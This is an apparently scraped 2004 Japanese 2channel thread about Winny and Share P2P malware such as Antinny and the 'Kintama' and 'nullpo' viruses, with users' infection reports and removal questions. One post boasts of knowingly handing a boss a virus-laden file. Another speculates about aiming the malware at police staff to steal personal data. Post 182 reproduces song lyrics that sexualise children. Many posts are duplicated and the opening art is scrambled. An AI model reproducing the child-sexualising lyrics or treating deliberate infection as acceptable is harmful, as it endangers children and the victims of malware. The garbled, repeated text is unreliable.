⊂ニニニ(__)_)ニニ⊃ .| |_ __ //|゚| ::丶
|| || ::/;.ヽ,` - ─ - -=./;;::,..`'ゝ\`丶
へヘ ─ - ─/;;/::: ̄;;;; ̄;;::|
| |。 |゚ y
゚| | |io i| バカが踏む
。| ゚i| 。i|,,ノ |i ぬるぼにキンタマ
i|゚ ||゚ /ii 。 ゚|i_/゚ エトセトラ
`ヽoー|i;|y-ノ
,;:i´i;ノ
('';ii;;''
ii\;;;ii'ノ
ノ ∧_∧ o .../::;
( ´∀`) () /二ヽ . .: :ii:|
(つ[] つ┃ |□| コンッ . .:__i:i|
(、 ^ヽ ^ヽ 旦~ `)三(´ ミ // ヾ.:
⊂ニニニ(__)_)ニニ⊃ .| |_ __ //|゚| ::丶
|| || ::/;.ヽ,` - ─ - -=./;;::,..`'ゝ\`丶
へヘ ─ - ─/;;/::: ̄;;;; ̄;;::|
84 :[名無し]さん(bin+cue).rar:04/12/17 12:47:52 ID:iyKMHfD3
でも、まだ解析もパターンも出てないニュイルスはあるよな。
コミック偽装のやつなんだが、問題はサイズがクソでかいので
提出するのマンドクセっつーか、メールで50Mも送れるのか?
コミック偽装のやつなんだが、問題はサイズがクソでかいので
提出するのマンドクセっつーか、メールで50Mも送れるのか?
85 :[名無し]さん(bin+cue).rar:04/12/17 13:39:46 ID:LLyzucmK
>>80
SpywareBlasterだ!
SpywareBlasterだ!
86 :[名無し]さん(bin+cue).rar:04/12/17 13:42:31 ID:7Aa16hUj
>>80
10ポインツ!!
10ポインツ!!
87 :[名無し]さん(bin+cue).rar:04/12/17 17:06:52 ID:QHL1Xk49
キンタマが完全に駆除できたかどうか調べある方法ってありますか?
88 :[名無し]さん(bin+cue).rar:04/12/17 17:11:49 ID:LLyzucmK
89 :[名無し]さん(bin+cue).rar:04/12/17 17:13:27 ID:QHL1Xk49
素早いレスありがとうございます。
もうちょっと調べてみます
もうちょっと調べてみます
90 :[名無し]さん(bin+cue).rar:04/12/17 17:14:31 ID:LLyzucmK
91 :[名無し]さん(bin+cue).rar:04/12/17 17:30:58 ID:vjEAm4sK
87さん、次からはモロッコに行って駆除なさい
それが一番確実です
それが一番確実です
92 :[名無し]さん(bin+cue).rar:04/12/17 17:44:21 ID:PdhegN4G
モロッコってなに?
93 :[名無し]さん(bin+cue).rar:04/12/17 17:58:18 ID:7JITTX38
>91
今はフィリピンじゃないか?モロッコだと非合法になったと聞いた希ガス
今はフィリピンじゃないか?モロッコだと非合法になったと聞いた希ガス
ああ、どうやら無事駆除できてたようです。
またひとつ知識が増えたようです。
ありがとうございました。
またひとつ知識が増えたようです。
ありがとうございました。
95 :[名無し]さん(bin+cue).rar:04/12/17 21:08:35 ID:LLyzucmK
96 :[名無し]さん(bin+cue).rar:04/12/17 22:52:13 ID:kWhLnNda
いやぁ、まさかこのスレからカルーセル麻紀が出るとは
97 :[名無し]さん(bin+cue).rar:04/12/18 00:49:06 ID:WFCq3a2Z
アンチニーの記事読んでいて、ちょっと思ったんだが、AとGの作者は恐らく違うよな?
で、Gは明らかに悪意を持っている。
アンチニーシリーズは、Winny壊滅を目指したものであったわけだけど、
この悪意が逆のところに向く、つまり警察や著作権団体のところに向かなかったのはなぜだろう?
やろうと思えば、警察関係者、著作権団体関係者のみを狙って個人情報を引き出せたはずだ。
で、以下の可能性が浮上してくる。
1、ny使用者が厨揃い
2、思いつかなかった
3、Aの被害例によって不特定多数を狙ったほうが面白いとわかった
4、警察、著作権団体側が流した
このうち可能性が高いのは3だ。でも、2を思いつかなかった奴がいないなんて思えない。
となると、4も捨てきれない。事実、警察で引っかかったのはたった一人だ。
これ以上書くの疲れる。
以降は未来に行ったドラえもんがのびたと一緒に未来大魔神を倒す話だから誰か書いて
で、Gは明らかに悪意を持っている。
アンチニーシリーズは、Winny壊滅を目指したものであったわけだけど、
この悪意が逆のところに向く、つまり警察や著作権団体のところに向かなかったのはなぜだろう?
やろうと思えば、警察関係者、著作権団体関係者のみを狙って個人情報を引き出せたはずだ。
で、以下の可能性が浮上してくる。
1、ny使用者が厨揃い
2、思いつかなかった
3、Aの被害例によって不特定多数を狙ったほうが面白いとわかった
4、警察、著作権団体側が流した
このうち可能性が高いのは3だ。でも、2を思いつかなかった奴がいないなんて思えない。
となると、4も捨てきれない。事実、警察で引っかかったのはたった一人だ。
これ以上書くの疲れる。
以降は未来に行ったドラえもんがのびたと一緒に未来大魔神を倒す話だから誰か書いて
98 :[名無し]さん(bin+cue).rar:04/12/18 01:09:01 ID:w1S4aKUu
逆引きしてpoliceにマッチしたら発動するっていうじゃない?
でもあなた、発動確率が低すぎるウイルス、ワームは拡散しませんから。残念。
でもあなた、発動確率が低すぎるウイルス、ワームは拡散しませんから。残念。
99 :[名無し]さん(bin+cue).rar:04/12/18 01:35:52 ID:0GTlAcOb
安易に陰謀だの何だの憶測にもなってない様な妄想に走ってはいかんよ
そもそもantinnyがny崩壊の為に作られたつうのは初耳だな、まぁ意図は制作者にしか分からないが
そもそもantinnyがny崩壊の為に作られたつうのは初耳だな、まぁ意図は制作者にしか分からないが
100 :[名無し]さん(bin+cue).rar:04/12/18 01:47:13 ID:ORY8Ra6V
>>99
ってか、名前そのままじゃん。
ってか、名前そのままじゃん。
101 :[名無し]さん(bin+cue).rar:04/12/18 02:33:51 ID:2oGjj3cy
>>100
作者が名前つけたんじゃないって
作者が名前つけたんじゃないって
102 :うさだ萌え ◆HkEgRy0Iso :04/12/18 17:04:35 ID:VjDrFkeV
103 :[名無し]さん(bin+cue).rar:04/12/18 18:24:19 ID:SA5AK0Wj
ハゲだいじょうぶだったかハゲ
104 :[名無し]さん(bin+cue).rar:04/12/18 19:00:46 ID:m7GZaeWD
美醜とかいうエロゲだったかな、二重拡張子な上に案の定ウイルス同梱だった。
上司に「落としといて」と言われたブツだが、なんとなくムカついたんでそのまま
渡しといた。
キンタマだったら簡便な
上司に「落としといて」と言われたブツだが、なんとなくムカついたんでそのまま
渡しといた。
キンタマだったら簡便な
105 :[名無し]さん(bin+cue).rar:04/12/18 19:11:49 ID:AyDGUBYb
おまいの会社って・・・
106 :[名無し]さん(bin+cue).rar:04/12/18 19:13:33 ID:MpWNnoMn
>>104
未必の故意だな。
未必の故意だな。
107 :[名無し]さん(bin+cue).rar:04/12/18 22:12:17 ID:Cvesj5bw
>>4 のWinnyFileDatabaseのサイトが見つからないんですが。
108 :[名無し]さん(bin+cue).rar:04/12/18 22:18:27 ID:Cvesj5bw
4じゃなくて、>>7でした。
109 :[名無し]さん(bin+cue).rar:04/12/18 22:25:27 ID:rwmVPrLA
110 :[名無し]さん(bin+cue).rar:04/12/18 22:32:44 ID:67exhsX2
>>107
それは あなたの 心の中に あります
それは あなたの 心の中に あります
111 :[名無し]さん(bin+cue).rar:04/12/18 22:35:28 ID:sY1rP96k
>>107
はるか昔に消滅した
はるか昔に消滅した
112 :[名無し]さん(bin+cue).rar:04/12/19 09:50:22 ID:QiM1Ztdx
.folderのファイルがフォルダのアイコンになってなかったら
クリックしても問題ないですか?
間違ってクリックしたのですが
このファイルを開けません
このファイルを開くには〜とかが出ました
クリックしても問題ないですか?
間違ってクリックしたのですが
このファイルを開けません
このファイルを開くには〜とかが出ました
113 :[名無し]さん(bin+cue).rar:04/12/19 10:06:21 ID:guK83xWn
((((;゚Д゚)))ガクガクブルブル
114 :[名無し]さん(bin+cue).rar:04/12/19 10:41:04 ID:bU/jnIAG
>>112
もう大丈夫だね
もう大丈夫だね
115 :ひみつの文字列さん:2024/12/18(水) 20:55:08 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
116 :[名無し]さん(bin+cue).rar:04/12/19 13:10:31 ID:LK5v94wH
117 :[名無し]さん(bin+cue).rar:04/12/19 14:07:49 ID:RzZlfR3G
118 :ひみつの文字列さん:2024/12/18(水) 20:55:08 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
119 :[名無し]さん(bin+cue).rar:04/12/19 14:41:25 ID:LK5v94wH
120 :[名無し]さん(bin+cue).rar:04/12/19 15:03:35 ID:5wFRgPLv
121 :[名無し]さん(bin+cue).rar:04/12/19 15:27:38 ID:day8Fe1b
>>120
http://www.microsoft.com/japan/technet/archive/community/columns/security/essays/10imlaws.mspx
> 鉄則 1: 悪意のある攻撃者の誘惑に乗って、
> 攻撃者のプログラムをあなたのコンピュータで実行した場合、
> もはやそれはあなたのコンピュータではない
http://www.microsoft.com/japan/technet/archive/community/columns/security/essays/10imlaws.mspx
> 鉄則 1: 悪意のある攻撃者の誘惑に乗って、
> 攻撃者のプログラムをあなたのコンピュータで実行した場合、
> もはやそれはあなたのコンピュータではない
122 :[名無し]さん(bin+cue).rar:04/12/19 15:48:37 ID:JORWqJhs
>>117
スレタイ嫁
スレタイ嫁
123 :[名無し]さん(bin+cue).rar:04/12/19 17:20:03 ID:zT7/TyVm
>>120
むしろこっちが知りたいよ
むしろこっちが知りたいよ
127 :[名無し]さん(bin+cue).rar:04/12/19 19:45:13 ID:i2vGzyU7
もう手遅れでどうにもならないから、あたふたしなくても大丈夫
ってことでないかと。
ってことでないかと。
128 :[名無し]さん(bin+cue).rar:04/12/19 19:46:42 ID:i2vGzyU7
もう手遅れでどうにもならないから、あたふたしなくても大丈夫
さっさと再インスコしろってことでないかと。
さっさと再インスコしろってことでないかと。
連投してしまいました。すいません。
ウイルススキャンしてみましたがCドライブからは何も出ませんでした。
レジストリエディタも普通に起動されますし、Win.iniもsystem.iniにも異常なしで、
変なテキストも表示されませんでした。ただ、別のドライブのSystem Volume Informationの
_restoreフォルダの下層から検出されました。どうやらAntinny.Dのようです・・・。
これってすでに感染してるんでしょうか?
ウイルススキャンしてみましたがCドライブからは何も出ませんでした。
レジストリエディタも普通に起動されますし、Win.iniもsystem.iniにも異常なしで、
変なテキストも表示されませんでした。ただ、別のドライブのSystem Volume Informationの
_restoreフォルダの下層から検出されました。どうやらAntinny.Dのようです・・・。
これってすでに感染してるんでしょうか?
130 :[名無し]さん(bin+cue).rar:04/12/19 22:51:15 ID:opb+5WnQ
>>130
あ、System Volume Informationから検出されたファイルは削除しました
あ、System Volume Informationから検出されたファイルは削除しました
132 :[名無し]さん(bin+cue).rar:04/12/20 01:08:38 ID:Ilh6uViA
すいません、winnyでスクールランブルの同人誌をダウンロードしてファイルを解凍したのですが、
中にexeファイルとtxtファイルが含まれていて、気味が悪いので削除しようとしたらしたら
txtファイルは削除出来たのですが、exeファイルが「ディスクがいっぱいか・・・」のエラーメッセージが出て
削除する事が出来ません。
この場合、もう何らかのウィルスに感染してるのでしょうか?
このexeファイルを削除するにはどうしたらいいのでしょうか?
誰か分かる方、お願いします。
中にexeファイルとtxtファイルが含まれていて、気味が悪いので削除しようとしたらしたら
txtファイルは削除出来たのですが、exeファイルが「ディスクがいっぱいか・・・」のエラーメッセージが出て
削除する事が出来ません。
この場合、もう何らかのウィルスに感染してるのでしょうか?
このexeファイルを削除するにはどうしたらいいのでしょうか?
誰か分かる方、お願いします。
133 :[名無し]さん(bin+cue).rar:04/12/20 01:15:04 ID:2lFYlwGc
134 :[名無し]さん(bin+cue).rar:04/12/20 01:42:36 ID:tLhD67hy
135 :[名無し]さん(bin+cue).rar:04/12/20 02:00:50 ID:DdOVCnvF
>>132 普通にDeleteボタンで消えると思ったが。
俺は他にもPE_PARITE.Aてのが入ってるのを見つけた。
これはガイシュツかな?
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/
default5.asp?VName=PE_PARITE.A&VSect=T
俺は他にもPE_PARITE.Aてのが入ってるのを見つけた。
これはガイシュツかな?
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/
default5.asp?VName=PE_PARITE.A&VSect=T
136 :[名無し]さん(bin+cue).rar:04/12/20 05:08:48 ID:2uJmhq+p
「C:\Program Files\mellpo」というフォルダが自動的に作成されて、
中にはアドレス帳やらメールボックスやらメイドキュメントの中身やらが共有されていますた。
「mellpo」でググっても情報が見つからないから比較的新種なのかな。
詳細情報をキボンヌ。
中にはアドレス帳やらメールボックスやらメイドキュメントの中身やらが共有されていますた。
「mellpo」でググっても情報が見つからないから比較的新種なのかな。
詳細情報をキボンヌ。
137 :[名無し]さん(bin+cue).rar:04/12/20 11:29:21 ID:t9r33ufG
mellpoはshare発という感じがあるんだが………正体はまだバレてないはず
138 :[名無し]さん(bin+cue).rar:04/12/20 12:43:50 ID:5N/OdnHz
>>136
うわ・・・俺もだ
shareで昨日やられたっぽい・・・
とりあえずフォルダ削除して
対策分かるまでshareやらnyやら起動しないようにするわ
レジストリとかも弄らないといけないのかな・・・
うわ・・・俺もだ
shareで昨日やられたっぽい・・・
とりあえずフォルダ削除して
対策分かるまでshareやらnyやら起動しないようにするわ
レジストリとかも弄らないといけないのかな・・・
139 :[名無し]さん(bin+cue).rar:04/12/20 12:49:44 ID:0EN3D05m
>>136-138
身に憶えは無いの?
身に憶えは無いの?
140 :[名無し]さん(bin+cue).rar:04/12/20 13:07:16 ID:Zq7+OZ21
>>138
昨日落とし終わったファイルを羅列しる。
昨日落とし終わったファイルを羅列しる。
141 :[名無し]さん(bin+cue).rar:04/12/20 13:38:32 ID:5N/OdnHz
>>139-140
速攻削除して分からん・・・
何かエロマンガだった思う
フォルダアイコン偽装にまんまと引っかかったよ・・・
展開したフォルダに「( ´∀`).mpg」というファイルがあった
踏んだ瞬間にHDDがガリガリいってたから、今考えるとドライブ中のdocやらを検索してたんだと思う
あと何故かfolder.iniを見てみたら、C:\Program Files\Adobe\Photoshop Elements\のフォルダーが
upフォルダーに設定されてた
このフォトショは最初からプリインストールされてたやつだけど
速攻削除して分からん・・・
何かエロマンガだった思う
フォルダアイコン偽装にまんまと引っかかったよ・・・
展開したフォルダに「( ´∀`).mpg」というファイルがあった
踏んだ瞬間にHDDがガリガリいってたから、今考えるとドライブ中のdocやらを検索してたんだと思う
あと何故かfolder.iniを見てみたら、C:\Program Files\Adobe\Photoshop Elements\のフォルダーが
upフォルダーに設定されてた
このフォトショは最初からプリインストールされてたやつだけど
142 :うさだ萌え ◆HkEgRy0Iso :04/12/20 15:54:34 ID:zL03PohW
上藤政樹の、
妹防衛隊Gテスター
美少女戦士ウォーズ
第2次美少女戦士ウォーズ
光の事件簿
スペースコップ みき 星感帯捜査記
精霊特捜フェアリィセイバー天狗団の陰謀
姫忍・舞影−淫法帖恥辱伝−
キボンヌ。
幼魔特捜クレアセイバー、っは、流れているみたいだが、なかなか、みないな。
妹防衛隊Gテスター
美少女戦士ウォーズ
第2次美少女戦士ウォーズ
光の事件簿
スペースコップ みき 星感帯捜査記
精霊特捜フェアリィセイバー天狗団の陰謀
姫忍・舞影−淫法帖恥辱伝−
キボンヌ。
幼魔特捜クレアセイバー、っは、流れているみたいだが、なかなか、みないな。
143 :[名無し]さん(bin+cue).rar:04/12/20 16:33:45 ID:vev/p3bn
苺キンタマの作者頑張ってるねー
まだウィルス作ってたんだ。
まだウィルス作ってたんだ。
144 :[名無し]さん(bin+cue).rar:04/12/20 17:11:49 ID:rQkdJOba
未だにアイコン偽装に引っかかる香具師居るんだね・・・
145 :[名無し]さん(bin+cue).rar:04/12/20 17:24:38 ID:Zt2ljF7U
146 :[名無し]さん(bin+cue).rar:04/12/20 19:04:56 ID:ksE6pWz6
>ID:5N/OdnHz
ジンチュウ乙
ジンチュウ乙
147 :[名無し]さん(bin+cue).rar:04/12/20 21:50:36 ID:B6vKdJtH
基本的な質問ですが。
キンタマ的ウイルスによってupされるファイルは、
winnyのシステム情報の「アップファイル個数」にカウントされるのでしょうか?
キンタマ的ウイルスによってupされるファイルは、
winnyのシステム情報の「アップファイル個数」にカウントされるのでしょうか?
148 :[名無し]さん(bin+cue).rar:04/12/20 22:14:04 ID:2lFYlwGc
149 :[名無し]さん(bin+cue).rar:04/12/21 01:28:32 ID:YaHBC907
あぷろだウイルスの負荷軽減版誰か作ってくれんかなぁ……
あれはみんなで楽しめる(・∀・)イイ!!ニュイルスだったんだが
ところでおまいら
にゅいるす と打って変換したら nyウイルス になった奴、俺以外に居るか?
あれはみんなで楽しめる(・∀・)イイ!!ニュイルスだったんだが
ところでおまいら
にゅいるす と打って変換したら nyウイルス になった奴、俺以外に居るか?
150 :[名無し]さん(bin+cue).rar:04/12/21 01:32:29 ID:16zs3jjC
ニュ居留守
になった
になった
151 :[名無し]さん(bin+cue).rar:04/12/21 01:58:03 ID:V6kCYzT9
キャンタマちゃん
152 :[名無し]さん(bin+cue).rar:04/12/21 02:26:10 ID:oiJS0jos
乳井留守
153 :[名無し]さん(bin+cue).rar:04/12/21 02:33:32 ID:P1OdR9YB
なんか、PC立ち上げるたびにノートンにうpデート汁!って言われるんだけど、
更新しても最新版ですが何かって言われる・・・
更新しても最新版ですが何かって言われる・・・
154 :[名無し]さん(bin+cue).rar:04/12/21 02:48:10 ID:ZP7Tu96T
悪夢の強制カウントダウンさえ無ければ火壁を解除できるのに
誰だよあんなの作ったの!
誰だよあんなの作ったの!
155 :[名無し]さん(bin+cue).rar:04/12/21 07:59:11 ID:8WCBWyvQ
エクスプローラのCPU使用率が99%で重くて仕方ないんだが
やられちまったのか・・
やられちまったのか・・
156 :[名無し]さん(bin+cue).rar:04/12/21 08:02:46 ID:cfhhGMpU
>>155
壊れたファイルでも開いただけじゃねーの?
壊れたファイルでも開いただけじゃねーの?
157 :[名無し]さん(bin+cue).rar:04/12/21 08:10:44 ID:kmTVirje
何度か再起動しても同じ現象になるね
ちと原因探ってみる
ちと原因探ってみる
158 :[名無し]さん(bin+cue).rar:04/12/21 09:33:31 ID:ciModtp+
強制カウントダウンって何の事?
shatdown -aで解除できるやつ?
shatdown -aで解除できるやつ?
159 :[名無し]さん(bin+cue).rar:04/12/21 09:53:06 ID:SQqPVDhQ
>153
ノートンスレチェキするよろし。時々有る症状な気がする
ノートンスレチェキするよろし。時々有る症状な気がする
160 :[名無し]さん(bin+cue).rar:04/12/21 14:45:35 ID:qVg1b+B2
期限切れじゃねえの?
161 :[名無し]さん(bin+cue).rar:04/12/22 11:36:55 ID:J7nk8JVH
関口 慎一
162 :[名無し]さん(bin+cue).rar:04/12/22 22:58:49 ID:ji2BbWNb
ttp://internet.watch.impress.co.jp/cda/news/2004/12/22/5918.html
nyを狙ったワーム・ウイルスの類だと思われるので、情報提供
今までも、裏では結構行なわれてきたが、表立ってやるとは厨よのう…
でもまぁ、こういう団体ががんばってくれると、例の裁判みたいに
キャッシュに残ってたファイル名だけで、犯罪だと立証するのが難しく
なるわけだな『ダミーファイルを落としてました&放流してました』
って言えばいいわけだ。ふーん。
nyを狙ったワーム・ウイルスの類だと思われるので、情報提供
今までも、裏では結構行なわれてきたが、表立ってやるとは厨よのう…
でもまぁ、こういう団体ががんばってくれると、例の裁判みたいに
キャッシュに残ってたファイル名だけで、犯罪だと立証するのが難しく
なるわけだな『ダミーファイルを落としてました&放流してました』
って言えばいいわけだ。ふーん。
163 :[名無し]さん(bin+cue).rar:04/12/22 23:15:13 ID:N1gwrArX
つか、そもそも被参照量に差が出るだろ
164 :[名無し]さん(bin+cue).rar:04/12/22 23:16:00 ID:xMhiHpFk
165 :[名無し]さん(bin+cue).rar:04/12/23 00:21:42 ID:xcl5hqDm
被参照量は偽装できる。
166 :[名無し]さん(bin+cue).rar:04/12/23 02:15:32 ID:Uo/mTtA2
(;´Д`)マジデツカ?
167 :[名無し]さん(bin+cue).rar:04/12/23 03:29:42 ID:/lauAsoK
「P2Pを使用しているな、自宅へいくぞ」 JASRAC、確認電話に注意呼びかけ
日本音楽著作権協会は、「P2Pを使用しているな、自宅へいくぞ」という
内容の電話が一般のユーザーへかけられていることを明らかにした。
協会では、詐欺事件に繋がりかねないとして注意を呼びかけている
http://www.itmedia.co.jp/lifestyle/articles/0412/22/news053.html
Winnyを狙ったというかP2Pを使ってる人を狙った新手の詐欺か・・・
流行りそう?
日本音楽著作権協会は、「P2Pを使用しているな、自宅へいくぞ」という
内容の電話が一般のユーザーへかけられていることを明らかにした。
協会では、詐欺事件に繋がりかねないとして注意を呼びかけている
http://www.itmedia.co.jp/lifestyle/articles/0412/22/news053.html
Winnyを狙ったというかP2Pを使ってる人を狙った新手の詐欺か・・・
流行りそう?
168 :[名無し]さん(bin+cue).rar:04/12/23 09:58:04 ID:UYeQ3LkG
>>167
個人事業主でドメイン取得とか、そう言う個人を特定出来ちゃう IPでやるな。ってこった。
個人事業主でドメイン取得とか、そう言う個人を特定出来ちゃう IPでやるな。ってこった。
169 :[名無し]さん(bin+cue).rar:04/12/23 11:51:34 ID:Px8Gs32i
なぜか突然繋がらなくなってNoderef見たら空白になってた
とりあえず最新のを保存しなおして起動したらしばらくしてまた部分的に消えてた
これはなんだ?
バージョンは1.14
とりあえず最新のを保存しなおして起動したらしばらくしてまた部分的に消えてた
これはなんだ?
バージョンは1.14
170 :[名無し]さん(bin+cue).rar:04/12/23 11:54:44 ID:a0xoE68L
>>169
ぶっちゃけ仕様
ぶっちゃけ仕様
171 :[名無し]さん(bin+cue).rar:04/12/23 12:05:48 ID:LQM05660
>>169
クラックの時限式のせいだよ
クラックの時限式のせいだよ
172 :[名無し]さん(bin+cue).rar:04/12/23 12:32:07 ID:y8wYmJVT
ダウンロードした不明なexeを実行してしまいました。
その時は何も起こらなかったのですが、Winnyのシステム情報に
アップファイル個数 1 となっていたので、おかしいなと思い
AntiVirus で調べたところ、Winny2\Up のフォルダと、その
中身が自動生成されたようで、ウィルスに感染してしまいました。
問題のWinny\Upフォルダや、UpFolder.txt 等は見えません。
Up フォルダや中身はウィルス検索時のみ見ることができます。
ProgramFiles を*.exe で検索してもAntinny.exe も出てきません。
関連情報ありましたらお助けくださいぃ。
その時は何も起こらなかったのですが、Winnyのシステム情報に
アップファイル個数 1 となっていたので、おかしいなと思い
AntiVirus で調べたところ、Winny2\Up のフォルダと、その
中身が自動生成されたようで、ウィルスに感染してしまいました。
問題のWinny\Upフォルダや、UpFolder.txt 等は見えません。
Up フォルダや中身はウィルス検索時のみ見ることができます。
ProgramFiles を*.exe で検索してもAntinny.exe も出てきません。
関連情報ありましたらお助けくださいぃ。
173 :[名無し]さん(bin+cue).rar:04/12/23 12:40:19 ID:b7GK+m8o
おとなしくOS再インストしとけ
174 :[名無し]さん(bin+cue).rar:04/12/23 12:46:37 ID:FQmCkula
175 :172:04/12/23 12:47:10 ID:y8wYmJVT
まとめサイトにありました。スンマソ
176 :[名無し]さん(bin+cue).rar:04/12/23 19:21:35 ID:NGDSjQ7h
キンタマか
177 :[名無し]さん(bin+cue).rar:04/12/23 19:38:54 ID:yrGR6IKZ
>ProgramFiles を*.exe で検索してもAntinny.exe も出てきません。
どうでも良いが、わざわざ其処にそのままの名前でexe作ってくれる制作者は正直どうかと思う
どうでも良いが、わざわざ其処にそのままの名前でexe作ってくれる制作者は正直どうかと思う
178 :[名無し]さん(bin+cue).rar:04/12/23 22:19:04 ID:9C1rX1sT
そこで「EXE ファイル 捨てたい」ですよ
179 :[名無し]さん(bin+cue).rar:04/12/23 22:37:13 ID:4FG1D07w
ぼくはロリコーン
180 :[名無し]さん(bin+cue).rar:04/12/23 22:40:05 ID:Hiry+9hN
わたしはシリコーン
181 :[名無し]さん(bin+cue).rar:04/12/23 22:45:06 ID:a0xoE68L
カイゾウニンゲン(・A・)イクナイ
182 :[名無し]さん(bin+cue).rar:04/12/23 22:53:54 ID:FakTVAMH
「僕はロリコン」(歌・KAWAI 曲・宮川賢)
ぼくが好きなのは子供 ママは駄目よとすがるけど
ボインの君ではunsatisfied
いたいけな子供が好き
毛も生えそろわない 淡い匂いがする
ろ・り・い・た ぼくはロリコン
ろ・り・い・た ぼくはアブナいお兄さん
塾まで迎えに行くよ 砂場で遊ぼよぼくと
暑けりゃ服を脱ぎなよ ぼくは見るだけで満足
ほら触れてご覧よ ピクピク動いてる
ろ・り・い・た ぼくはロリコン
ろ・り・い・た 禁断の果実
パパママごめんなさい
許して悪い子だよね
だけど子供が好き
ろ・り・い・た ぼくはアブノーマル
ろ・り・い・た ぼくは変質者かもね
ろ・り・い・た ぼくはロリコン
ろ・り・い・た 禁断の果実
http://douch.net/cgi-bin1/src/up0280.swf
ぼくが好きなのは子供 ママは駄目よとすがるけど
ボインの君ではunsatisfied
いたいけな子供が好き
毛も生えそろわない 淡い匂いがする
ろ・り・い・た ぼくはロリコン
ろ・り・い・た ぼくはアブナいお兄さん
塾まで迎えに行くよ 砂場で遊ぼよぼくと
暑けりゃ服を脱ぎなよ ぼくは見るだけで満足
ほら触れてご覧よ ピクピク動いてる
ろ・り・い・た ぼくはロリコン
ろ・り・い・た 禁断の果実
パパママごめんなさい
許して悪い子だよね
だけど子供が好き
ろ・り・い・た ぼくはアブノーマル
ろ・り・い・た ぼくは変質者かもね
ろ・り・い・た ぼくはロリコン
ろ・り・い・た 禁断の果実
http://douch.net/cgi-bin1/src/up0280.swf
183 :[名無し]さん(bin+cue).rar:04/12/23 22:55:23 ID:fnxo3dBF
>182
ページが見つかりません
ページが見つかりません
184 :[名無し]さん(bin+cue).rar:04/12/23 23:07:47 ID:4FG1D07w
俺「いたいけな子供が好き」の部分のモノマネ上手いよ。
185 :[名無し]さん(bin+cue).rar:04/12/24 00:26:02 ID:umwhgvRd
スレ違いだが( ゚д゚)ポカーンだったので
104 名無しさんの次レスにご期待下さい sage 04/12/24 00:17:53 ID:wXId0gGB
http://up.satoweb.net/img10/3738.zip
前スレのこれってマジでウイルス?
ふんじまったよ・・・orz
105 名無しさんの次レスにご期待下さい 04/12/24 00:19:09 ID:CYAQG0ed
文字バレさんくす!これで年越せます!
106 名無しさんの次レスにご期待下さい sage 04/12/24 00:23:17 ID:N5ybAyNN
>>104
で、踏んでからどうした?
開いて解凍したのか?
107 名無しさんの次レスにご期待下さい sage New! 04/12/24 00:24:43 ID:SLX4MUd2
>>106
開いてから解凍?
知ったかで説明しようとするとはさすが厨房さんですね
104 名無しさんの次レスにご期待下さい sage 04/12/24 00:17:53 ID:wXId0gGB
http://up.satoweb.net/img10/3738.zip
前スレのこれってマジでウイルス?
ふんじまったよ・・・orz
105 名無しさんの次レスにご期待下さい 04/12/24 00:19:09 ID:CYAQG0ed
文字バレさんくす!これで年越せます!
106 名無しさんの次レスにご期待下さい sage 04/12/24 00:23:17 ID:N5ybAyNN
>>104
で、踏んでからどうした?
開いて解凍したのか?
107 名無しさんの次レスにご期待下さい sage New! 04/12/24 00:24:43 ID:SLX4MUd2
>>106
開いてから解凍?
知ったかで説明しようとするとはさすが厨房さんですね
186 :[名無し]さん(bin+cue).rar:04/12/24 03:42:54 ID:8NxOyVpT
デスクトップ上に血痕のような模様がぽつぽつ出て画面上が赤一色に。
(よく見ると赤の中に【ぬるぽ】と彫ってある)
『キャー』という女性の悲鳴があがる。
・・・という症状が出たんですがこれはぬるぽウイルスの亜種でしょうか?
ぬるぽと同じ症状も出ていて、UPフォルダも作成されていましたが、それ以外にも
どうもSYSTEMファイルのDLLをぶっ壊していくみたいで、
PC立ち上げる事もできなくなってしましました。
(よく見ると赤の中に【ぬるぽ】と彫ってある)
『キャー』という女性の悲鳴があがる。
・・・という症状が出たんですがこれはぬるぽウイルスの亜種でしょうか?
ぬるぽと同じ症状も出ていて、UPフォルダも作成されていましたが、それ以外にも
どうもSYSTEMファイルのDLLをぶっ壊していくみたいで、
PC立ち上げる事もできなくなってしましました。
187 :[名無し]さん(bin+cue).rar:04/12/24 04:03:50 ID:uUqBCgi/
188 :[名無し]さん(bin+cue).rar:04/12/24 07:09:10 ID:Q5quRnkz
189 :[名無し]さん(bin+cue).rar:04/12/24 10:47:53 ID:voDME3/R
>>186
散々、既出なのでテンプレ読めばいいよ
散々、既出なのでテンプレ読めばいいよ
190 :[名無し]さん(bin+cue).rar:04/12/24 11:31:36 ID:8NxOyVpT
SYSTEMファイルのDLLをぶっ壊していく?そんな症状あったかな…?
191 :[名無し]さん(bin+cue).rar:04/12/24 12:41:33 ID:Qgb+mryZ
>>190
あったんじゃない? 「血しぶき」=「致死武器」
あったんじゃない? 「血しぶき」=「致死武器」
192 :[名無し]さん(bin+cue).rar:04/12/24 13:11:56 ID:voDME3/R
193 :[名無し]さん(bin+cue).rar:04/12/24 14:16:34 ID:lpuGa9PN
ま、何はともあれメリークリスマスってことだろ
194 :[名無し]さん(bin+cue).rar:04/12/24 14:34:48 ID:qn0/HMWA
今夜から明日にかけて、喪男が全身全霊を込めて作成したぬるぽ
亜種が猛威を振るうような気がする。(´・ω・`)
亜種が猛威を振るうような気がする。(´・ω・`)
195 :[名無し]さん(bin+cue).rar:04/12/24 16:45:25 ID:8NxOyVpT
ちしぶきぬるぽ俺知らなかった。>>186見て、イカすデスクトップとして
使えないかなと思っていたがPC起動もできなくなるの?
使えないかなと思っていたがPC起動もできなくなるの?
196 :[名無し]さん(bin+cue).rar:04/12/24 16:48:25 ID:UCSftKsh
197 :[名無し]さん(bin+cue).rar:04/12/24 16:53:11 ID:qn0/HMWA
聖なる夜に羞恥プレイとは、なかなかやるな。
叩かれた上にさらに恥の上塗りをする>>195に乾杯。(´・ω・`)つ
叩かれた上にさらに恥の上塗りをする>>195に乾杯。(´・ω・`)つ
198 :[名無し]さん(bin+cue).rar:04/12/24 18:16:53 ID:q/j6BqLC
>>195
(^^;(^^;(^^;(^^;(^^;(^^;
(^^;(^^;(^^;(^^;(^^;(^^;
199 :[名無し]さん(bin+cue).rar:04/12/24 18:42:03 ID:0Y0i87Iq
200 :[名無し]さん(bin+cue).rar:04/12/24 18:48:40 ID:1sNzy30w
まあまあ、クリスマスだ。
主は仰った「バレバレの自演でプギャー となる者は幸である」と
主は仰った「バレバレの自演でプギャー となる者は幸である」と
